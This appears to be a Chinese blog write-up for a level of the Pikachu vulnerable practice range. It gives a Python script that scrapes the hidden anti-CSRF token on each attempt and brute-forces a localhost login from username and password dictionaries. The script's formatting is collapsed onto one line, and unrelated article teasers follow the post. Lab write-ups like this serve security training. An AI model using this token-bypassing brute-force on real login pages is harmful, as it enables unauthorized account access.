pikachu靶场通关之暴力破解token防爆破

这里写pikachu靶场token防爆破的第二种解法

用python脚本跑,下面是代码

import requests
from bs4 import BeautifulSoup# url填自己的url
url = 'http://localhost:8086/pikachu-master/vul/burteforce/bf_token.php'
# 取出账号字典里的值,1.txt就是账号字典
with open('1.txt', 'r', encoding="utf-8") as u:for username in u:# 取出密码字典里的值,2.txt就是密码字典with open('2.txt', 'r', encoding="utf-8") as p:for password in p:# 创建一个session对象r = requests.session()# 发起请求response = r.get(url)soup = BeautifulSoup(response.text, 'lxml')# 找到token并取出token = soup.find_all('input', type='hidden')[0]['value']# 构造payloadpayload = {"username": username.strip(),"password": password.strip(),'token': token,'submit': 'Login'}response = r.post(url, data=payload)soup = BeautifulSoup(response.text, 'lxml')# 判断如果登录成功,则打印用户名与密码,否则什么也不干if 'success' in soup.find_all('p')[0].text.strip():print('用户名:', username.strip(), '\n密码', password.strip())

跑出来的结果为

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/704287.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Google play开发者账号被封了,内购的款还可以提出来吗?

在Google paly上架过程中,很多开发者通过内购的方式来获取收益或变现。不过,有时会因为违反了Google play相关规定或其它原因,导致应用下架,账号被封,在这样的情况下,开发者们最关心的问题之一就是&#xf…

1. 杜克大学官方宣布2027届新生画像什么是vue关键特点核心概念简单示例生态系统

目录 1. 杜克大学官方宣布2027届新生画像 什么是vue 关键特点 核心概念 简单示例 生态系统 1. 杜克大学官方宣布2027届新生画像 杜克大学校报《The Chronicle》已连续第七年对杜克大学的一年级新生进行深入调查,探讨该群体家庭受教育背景、家庭收入水平以及…

放松冥想心得体会|流静冥想

冥想,古已有之。昔人云:“静以修身”,非虚言也。放松心灵,乃通往内在平和之路。社恐者,常困于喧嚣之境,心难宁静。然,以冥想之法,可徐徐引导,渐归宁谧。 坐于幽室&#x…

搭载全新升级viaim AI,讯飞会议耳机Pro 2首销价1399元起

2024年5月15日,人工智能硬件公司未来智能发布了讯飞会议耳机Pro 2、iFLYBUDS 2以及Kit 2三款旗舰新品,为用户带来全新升级的viaim AI,也为AIGC智能耳机树立了新标杆。 在发布会上,未来智能CEO马啸表示:在AIGC领域&…

低功耗音频编解码器CJC8990

由工采网代理的CJC8990是一款低功耗音频编解码器,拥有先进的功能并提供高质量音频,非常适合于便携式数字音频应用,支持多种音频数据格式,包括I2S, DSP模式。 产品介绍: 该芯片工作电压:1.5V~3…

qmake、CMake、make和Makefile

为了跟踪C工程的全部部分,要求有一种机制来精确地指定: 涉及的输入文件,如源代码文件:.cpp,头文件:.h建立程序时所需的工具,如编译器: g.exe,链接器:ld.exe&a…

乡村振兴与农村基础设施建设:加大投入力度,提升建设水平,完善农村基础设施网络,打造宜居宜业的美丽乡村

一、引言 乡村振兴战略是我国在新时代推进农业农村现代化的重大战略部署,其核心目标是实现乡村的全面振兴,促进农业强、农村美、农民富。农村基础设施建设作为乡村振兴的基石,其建设水平直接关系到乡村经济的持续健康发展、乡村环境的改善以…

你还在手动加好友?试试这款神器,释放双手自动添加!

你还在手动添加微信好友吗?尤其是在忙碌的时候,手动加好友不仅费时又很容易出错。试试这个自动添加好友神器——个微管理系统,释放你的双手,轻松拓展好友列表! 1、多号同时登录在线 系统支持多个微信号同时登录在线&…

Dynamic Rumor Control in Social Networks using Temporal Graph Neural Networks

Abstract 在线平台上谣言和错误信息的普遍传播需要采取积极有效的方法来检测和减轻其影响。我们提出的方法利用社交网络交互的时间动态,并将其集成到时间图神经网络(TGNN)模型中,以进行谣言检测和控制。研究首先制定TGNN模型的数学…

CentOS上Zookeeper集群安装部署

简介 Zookeeper是一款分布式的集群化软件,可以在多台服务器上部署,并协同组成分布式集群一起工作。 ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,是Hadoop和Hbase的重要组件。它是一个为分布式应用提供一致性服务的…

ue引擎游戏开发笔记(38)——实现敌人接收攻击伤害,并作出反应

1.需求分析: 现在已经显示造成实际伤害,但敌人对实际伤害并未产生反馈,例如还击,或者死亡倒地等等,实现敌人对于受击的反馈。 2.操作实现: 1.思路:在动画蓝图中添加死亡动画,并通过…

uac驱动模块传参

static char*book_name "dissecting linux device drvier"; module_param(book_name,charp,S_IRUGO);static int book_num 4000; module_param(book_num,int,S_IRUGO);加载很多依赖驱动 insmod usb_f_uac1.ko book_name"linux world" book_num123456 …